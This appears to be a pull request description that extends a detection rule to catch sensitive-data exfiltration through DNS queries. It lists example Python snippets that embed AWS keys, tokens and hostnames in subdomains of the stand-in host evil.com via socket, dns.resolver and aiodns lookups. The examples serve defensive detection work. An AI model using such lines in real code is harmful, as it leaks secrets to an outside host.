Detect sensitive data exfiltration via DNS

[dwBruijn]

Hello,

Added sinks to exfiltrate-sensitive-data to detect data exfiltration attempts via DNS queries which is very common.
Improved sources like os.getenv($ENVVAR) to match calls with default val which was evading detection: os.getenv($ENVVAR, ...).

Common patterns include:

import socket
socket.gethostbyname(f"{aws_key}.evil.com")
socket.getaddrinfo(f"{hostname}.evil.com", 80)
socket.gethostbyname_ex(f"{user}.evil.com")

import dns.resolver
dns.resolver.query(f"{aws_secret}.evil.com", 'A')
dns.resolver.resolve(f"{token}.evil.com", 'A')

resolver = dns.resolver.Resolver()
resolver.query(f"{cwd}.evil.com", 'A')

resolver = dns.resolver.Resolver()
resolver.resolve(f"{env_data}.evil.com", 'A')

import aiodns
async def exfil():
    resolver = aiodns.DNSResolver()
    await resolver.query(f"{hostname}.evil.com", 'A')